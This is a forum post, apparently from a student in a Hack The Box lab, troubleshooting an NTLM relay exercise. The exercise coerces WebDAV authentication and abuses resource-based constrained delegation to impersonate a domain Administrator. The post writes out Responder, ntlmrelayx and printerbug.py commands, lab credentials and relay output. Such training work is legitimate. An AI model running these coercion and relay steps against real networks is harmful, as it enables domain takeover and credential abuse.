I am stuck with the second exercise:
Coerce the computer that got WebDAV enabled into performing HTTP NTLM authentication and then abuse RBCD to delegate a computer account to authenticate to it. Impersonate the Administrator account and submit the file’s contents at ‘C:\Users\Administrator\Desktop\flag.txt’.
When running printerbug.py, ntlmrelayx reports:
[*] HTTPD(80): Connection from INLANEFREIGHT/SQL01$@172.16.117.60 controlled, attacking target ldaps://INLANEFREIGHT\SQL01$@172.16.117.3
[*] HTTPD(80): Authenticating against ldaps://INLANEFREIGHT\SQL01$@172.16.117.3 as INLANEFREIGHT/SQL01$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] All targets processed!
[*] HTTPD(80): Connection from INLANEFREIGHT/SQL01$@172.16.117.60 controlled, but there are no more targets left!
[-] User not found in LDAP: plaintext$
[-] User to escalate does not exist!
[*] All targets processed!
Essentially, it says “User not found in LDAP: plaintext$”.
But in fact, I do control that account:
htb-student@ubuntu:~$ crackmapexec smb 172.16.117.60 -u plaintext$ -p 'o6@ekK5#rlw2rAe'
SMB 172.16.117.60 445 SQL01 [*] Windows 10.0 Build 17763 x64 (name:SQL01) (domain:INLANEFREIGHT.LOCAL) (signing:False) (SMBv1:False)
SMB 172.16.117.60 445 SQL01 [+] INLANEFREIGHT.LOCAL\plaintext$:o6@ekK5#rlw2rAe
htb-student@ubuntu:~$
So, what is the problem?
In order to solve that second exercise, I run the following commands (with WebDAV enabled on 172.16.117.60).
-
Run Responder to poison broadcast attacks:
htb-student@ubuntu:~$ sudo python3 ./tools/Responder/Responder.py -I ens192 -
Relay HTTP NTLM authentication over LDAP to the DC:
htb-student@ubuntu:~$ sudo ntlmrelayx.py -t ldaps://INLANEFREIGHT\\'SQL01$'@172.16.117.3 --delegate-access --escalate-user 'plaintext$' --no-smb-server --no-dump -
Run printerbug.py to trigger HTTP NTLM authentication to our attack host:
htb-student@ubuntu:~$ python3 ./tools/krbrelayx/printerbug.py inlanefreight/'plaintext$':'o6@ekK5#rlw2rAe'@172.16.117.60 LINUX01@80/print
[*] Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Attempting to trigger authentication via rprn RPC at 172.16.117.60
[*] Bind OK
[*] Got handle
RPRN SessionError: code: 0x6ba - RPC_S_SERVER_UNAVAILABLE - The RPC server is unavailable.
[*] Triggered RPC backconnect, this may or may not have worked
htb-student@ubuntu:~$
- I can see that Responder poisons the broadcast request:
[*] [MDNS] Poisoned answer sent to 172.16.117.60 for name linux01.local
[*] [LLMNR] Poisoned answer sent to 172.16.117.60 for name linux01
[*] [MDNS] Poisoned answer sent to 172.16.117.60 for name linux01.local
[*] [LLMNR] Poisoned answer sent to 172.16.117.60 for name linux01
[*] [LLMNR] Poisoned answer sent to fe80::3009:eecd:fd0e:f771 for name linux01
[*] [MDNS] Poisoned answer sent to fe80::3009:eecd:fd0e:f771 for name linux01.local
[*] [MDNS] Poisoned answer sent to fe80::3009:eecd:fd0e:f771 for name linux01.local
- But ntlmrelayx cannot escalate privileges to the plaintext$ user:
[*] HTTPD(80): Connection from INLANEFREIGHT/SQL01$@172.16.117.60 controlled, attacking target ldaps://INLANEFREIGHT\SQL01$@172.16.117.3
[*] HTTPD(80): Authenticating against ldaps://INLANEFREIGHT\SQL01$@172.16.117.3 as INLANEFREIGHT/SQL01$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] All targets processed!
[*] HTTPD(80): Connection from INLANEFREIGHT/SQL01$@172.16.117.60 controlled, but there are no more targets left!
[-] User not found in LDAP: plaintext$
[-] User to escalate does not exist!
Does anybody have the same problem?
Or knows what to do?
